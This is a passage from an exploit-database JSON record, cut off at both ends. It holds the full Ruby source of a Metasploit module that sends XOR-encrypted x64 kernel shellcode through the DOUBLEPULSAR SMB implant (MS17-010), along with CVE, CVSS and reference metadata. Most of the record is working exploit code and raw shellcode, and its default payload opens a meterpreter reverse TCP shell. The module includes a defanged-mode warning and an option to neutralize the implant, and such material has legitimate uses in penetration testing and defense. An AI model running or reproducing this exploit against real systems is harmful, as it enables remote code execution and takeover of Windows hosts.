\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:23:13", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d09f451f1a38bfe66b23d434725fb0ec", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-11T00:23:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-11T00:23:49", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-11T00:23:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n 